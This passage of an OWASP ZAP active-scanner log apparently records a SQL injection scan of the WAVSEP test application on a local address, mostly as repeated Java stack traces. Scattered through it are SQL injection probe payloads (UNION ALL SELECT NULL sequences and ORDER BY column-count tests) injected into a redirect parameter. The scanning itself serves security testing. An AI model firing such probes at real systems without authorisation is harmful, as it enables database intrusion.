org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681789 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681790 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681790 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681792 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681792 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681793 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681794 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' ORDER BY 8842-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' ORDER BY 8842-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681795 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681795 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681796 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681796 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681797 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 2752-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 2752-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 